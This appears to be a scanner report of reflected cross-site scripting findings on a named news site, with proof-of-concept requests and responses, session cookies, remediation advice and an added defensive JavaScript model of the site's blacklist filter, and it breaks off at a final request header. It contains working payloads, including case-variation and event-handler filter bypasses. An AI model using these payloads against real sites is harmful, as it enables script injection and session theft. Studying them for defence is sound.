The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/microsoft/index62402</script><a b=c>e2298a1ea0c;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=976256369;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f3a"><script>alert(1)</script>3f16ea69cb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b4f3a"><script>alert(1)</script>3f16ea69cb8/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31365
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//b4f3a"><script>alert(1)</script>3f16ea69cb8/mai;kvarticleid=;kvauthor=;loc=300;grp=419980978" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15444"><a%20b%3dc>fd7ff8d3413 was submitted in the REST URL parameter 3. This input was echoed as 15444"><a b=c>fd7ff8d3413 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives15444"><a%20b%3dc>fd7ff8d3413/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63625
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives15444"><a b=c>fd7ff8d3413/mobile/index;kvarticleid=;kvauthor=;loc=300;grp=302285423" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b9d2'-alert(1)-'5b09b4b8f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives6b9d2'-alert(1)-'5b09b4b8f0d/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63710
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives6b9d2'-alert(1)-'5b09b4b8f0d/mobile/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=765338386;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e51</ScRiPt%20><script>alert(1)</script>8d36d72825 was submitted in the REST URL parameter 4. This input was echoed as b3e51</ScRiPt ><script>alert(1)</script>8d36d72825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate, as the case-variation bypass shown here illustrates, and should be replaced with allow-list validation of the input against its expected format and context-specific output encoding of every reflected value.
Request
GET /blog/main/archives/b3e51</ScRiPt%20><script>alert(1)</script>8d36d72825/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59346
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/b3e51</ScRiPt ><script>alert(1)</script>8d36d72825;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=570240748;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate, as the case-variation bypass shown here illustrates, and should be replaced with allow-list validation of the input against its expected format and context-specific output encoding of every reflected value.
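The blacklist behaviour above, together with the double-quoted attribute reflections reported on this page (the href of the adtech link), is modelled in the following added example. It is not code from the page or from the site's platform: the filter is an assumed reconstruction of what the scanner inferred (it rejects the literal token "script"), the adserver.example hostname is hypothetical, and the allow-list pattern for an archive path segment is an assumption drawn from the legitimate segments visible in the requests (archives, microsoft, wolfes_den). It shows the case-variation bypass, shows that even a case-insensitive version of the filter still passes the img onerror payload reported further down, and replaces the filter with allow-list input validation plus encoding for the attribute context.

```javascript
// Added example (not code from the scanned site or its platform).
// Models the attribute-context sink in this report: a URL path segment is
// spliced into the double-quoted href of an ad link. Compares a keyword
// blacklist (an assumed model of the filter the scanner observed) with
// allow-list validation and output encoding for the context the value lands in.

// Payloads reported on this page for the double-quoted attribute context.
const ATTR_PAYLOADS = [
  'b4f3a"><script>alert(1)</script>3f16ea69cb8',      // lowercase token
  '63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601',      // case-varied to beat the filter
  '62bd0"><img src=a onerror=alert(1)>ecb015eff65',   // no "script" token at all
];

// Assumed model of the filter: rejects input containing the literal token
// "script". Case-sensitive, so "ScRiPt" walks straight through.
function blacklistAllows(segment) {
  return segment.indexOf("script") === -1;
}

// The obvious "fix" to that filter. Still passes the event-handler payload,
// which contains no such token: blacklists enumerate the wrong set.
function blacklistCiAllows(segment) {
  return !/script/i.test(segment);
}

// Allow-list validation: what a blog archive path segment legitimately looks
// like (assumed format: letters, digits, underscore, hyphen). Reject, do not
// sanitise, anything else.
function isValidArchiveSegment(segment) {
  return /^[A-Za-z0-9_-]{1,64}$/.test(segment);
}

// The ad link as the site renders it: raw segment inside href="..."
// (hostname hypothetical).
function renderLinkVulnerable(segment) {
  return '<a href="http://adserver.example/ad;key=archives/' + segment +
    '/index" target="_blank">ad</a>';
}

// Encoding for a double-quoted HTML attribute value. The value is also a URL
// path piece, so it is percent-encoded first for the URL parser; the entity
// encoding then guarantees the HTML parser cannot see a quote or a tag start.
function htmlAttrEncode(s) {
  return s.replace(/[&<>"']/g, function (c) {
    return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" }[c];
  });
}
function renderLinkSafe(segment) {
  return '<a href="http://adserver.example/ad;key=archives/' +
    htmlAttrEncode(encodeURIComponent(segment)) + '/index" target="_blank">ad</a>';
}

// Reviewer's check: count tag starts in the rendered fragment. A correct
// rendering of one <a> element has exactly one, whatever the segment held.
function countTagStarts(html) {
  return (html.match(/<[A-Za-z]/g) || []).length;
}

// Stand-alone run: one line per payload.
if (typeof require !== "undefined" && require.main === module) {
  ATTR_PAYLOADS.forEach(function (p) {
    console.log(
      "blacklist:", blacklistAllows(p) ? "passes" : "blocked",
      "| case-insensitive:", blacklistCiAllows(p) ? "passes" : "blocked",
      "| allow-list:", isValidArchiveSegment(p) ? "valid" : "rejected",
      "| tag starts vulnerable/safe:",
      countTagStarts(renderLinkVulnerable(p)) + "/" + countTagStarts(renderLinkSafe(p))
    );
  });
}
```

The allow-list check belongs at the point where the path is parsed, so that a rejected segment never reaches any sink; the attribute encoding belongs at the point of output and is applied regardless, because the same value may later be reflected by a template that the validation was not written for.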
Request
GET /blog/main/archives/63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59299
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601/index;kvarticleid=;kvauthor=;loc=300;grp=352272834" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8607'-alert(1)-'e6ba9ce3ca0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/mobile/index.htmlf8607'-alert(1)-'e6ba9ce3ca0 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59384
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/mobile/indexf8607'-alert(1)-'e6ba9ce3ca0;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=280754808;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30d5"><a>760a25fa775 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/mobile/index.htmld30d5"><a>760a25fa775 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59155
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/mobile/indexd30d5"><a>760a25fa775;kvarticleid=;kvauthor=;loc=300;grp=858994798" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62bd0"><img%20src%3da%20onerror%3dalert(1)>ecb015eff65 was submitted in the REST URL parameter 1. This input was echoed as 62bd0"><img src=a onerror=alert(1)>ecb015eff65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog62bd0"><img%20src%3da%20onerror%3dalert(1)>ecb015eff65/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31413
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.blog62bd0"><img src=a onerror=alert(1)>ecb015eff65/atc3./"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da15e'-alert(1)-'4d3e99808f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogda15e'-alert(1)-'4d3e99808f/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31332
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//blogda15e'-alert(1)-'4d3e99808f/main/archives/w;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=998296183;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f73"><ScRiPt>alert(1)</ScRiPt>b9586f0a04a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate, as the case-variation bypass shown here illustrates, and should be replaced with allow-list validation of the input against its expected format and context-specific output encoding of every reflected value.
Request
GET /blog/main89f73"><ScRiPt>alert(1)</ScRiPt>b9586f0a04a/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64739
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6778"><a>9ddab5d82b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivesa6778"><a>9ddab5d82b5/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63621
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivesa6778"><a>9ddab5d82b5/wolfes_den/index;kvarticleid=;kvauthor=;loc=300;grp=401528355" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20bcd</ScRiPt%20><a%20b%3dc>1fde3da0bf7 was submitted in the REST URL parameter 3. This input was echoed as 20bcd</ScRiPt ><a b=c>1fde3da0bf7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate, as the case-variation bypass shown here illustrates, and should be replaced with allow-list validation of the input against its expected format and context-specific output encoding of every reflected value.
Request
GET /blog/main/archives20bcd</ScRiPt%20><a%20b%3dc>1fde3da0bf7/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63715
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives20bcd</ScRiPt ><a b=c>1fde3da0bf7/wolfes;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=425228020;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aebb'-alert(1)-'39925577aae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
